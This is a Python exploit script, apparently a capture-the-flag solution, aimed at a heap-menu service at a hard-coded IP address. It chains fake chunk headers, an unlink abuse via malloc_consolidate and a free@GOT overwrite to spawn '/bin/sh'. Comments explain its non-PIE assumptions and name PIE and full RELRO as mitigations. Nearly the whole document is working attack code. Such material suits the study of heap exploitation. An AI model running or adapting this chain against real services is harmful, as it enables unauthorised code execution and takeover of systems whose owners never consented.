- #!/usr/bin/python
- # Author : peternguyen
- from Pwn import *
# Module-level connection object for the CTF service; the socket is only
# opened later by exploit(), which may also swap in a caller-supplied Pwn.
p = Pwn(mode=1, host='47.75.128.158', port=9999)
def alloc(name, type):
    """Send the service's "alloc" command (menu option 1).

    Writes the option number, then ``type``, then ``name`` over the
    module-level ``p`` connection. ``type`` shadows the builtin but is
    kept because it is part of the call signature.
    """
    option = 1
    p.sendint(option)
    p.sendint(type)
    p.send(name)
def free(idx):
    """Send the service's "free" command (menu option 2) for entry ``idx``."""
    option = 2
    p.sendint(option)
    p.sendint(idx)
def edit(idx, name, data):
    """Send the service's "edit" command (menu option 3).

    Writes the option number and ``idx``, followed by the two payload
    fields in the order ``name`` then ``data``.
    """
    option = 3
    p.sendint(option)
    p.sendint(idx)
    for field in (name, data):
        p.send(field)
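def exploit(**kargs):
    """Run the heap-corruption chain against the connected service.

    Keyword args:
        p: optional Pwn instance used instead of the module-level ``p``.
           It is only accepted when its class is literally named ``Pwn``.

    Every address in this chain (0x602120, 0x6020c8, 0x6020d0, 0x602018,
    0x4006E0) is hard-coded and no leak is performed, so the script
    assumes a non-PIE binary with a writable GOT. From a defender's side,
    PIE and full RELRO are the mitigations that would break the final
    free@GOT overwrite; the exact payload layouts depend on the Pwn
    helpers ``pA`` and ``pack``, which are not visible here.
    """
    global p  # rebinds the module-level connection, not a local copy
    # ``'p' in kargs`` replaces dict.has_key(), which Python 3 removed;
    # the semantics are identical on Python 2.
    if 'p' in kargs:
        if kargs['p'].__class__.__name__ == 'Pwn':  # is pwn object
            p = kargs['p']
    p.connect()
    # pA(0, 0x21) presumably packs the pair (0, 0x21) — assumed to be a
    # fake chunk header, TODO confirm against Pwn; padded to 47 bytes.
    t = p.pA(0, 0x21)
    t = t.ljust(47, 'X')
    # raw_input('Debug>')
    alloc('A'*7, 1)  # 0
    alloc('B'*7, 2)  # 1
    alloc('C'*7, 1)  # 2
    edit(1, 'R'*7, t)
    free(0)
    # Second payload: same header, eight NUL bytes, padded to 47 with 'A'.
    t = p.pA(0, 0x21)
    t += '\x00'*8
    t = t.ljust(47, 'A')
    # The name field carries pack(0x602120) with its last byte dropped.
    edit(0, p.pack(0x602120)[:-1], t)
    alloc('A'*7, 1)
    alloc('B'*7, 1)
    free(0)
    # Third payload: header (0, 0x11), NULs, and the two 0x6020c8/0x6020d0
    # pointers referred to by the comment below (the "pigs list").
    t = p.pA(0, 0x11) + '\x00'*8 + p.pack(0x00)
    t += p.pack(0x6020c8) + p.pack(0x6020d0)[:-1]
    edit(0, p.pack(0x602120)[:-1], t)
    alloc('A'*7, 1)
    alloc('A'*7, 13337)  # trigger malloc_consolidate
    # abuse unlink forward_chunk to overwrite
    # pigs list
    p.send('a')
    # raw_input('>')
    edit(4, p.pack(0x602018)[:-1], t)  # free_got
    edit(1, p.pack(0x04006E0)[:-1], t)
    edit(0, '/bin/sh', t)
    # free(0) now dispatches through the rewritten GOT entry.
    free(0)
    p.io()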
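if __name__ == '__main__':
    # Guard the entry point so importing this module (for example to reuse
    # the alloc/free/edit helpers) does not run the chain automatically.
    exploit()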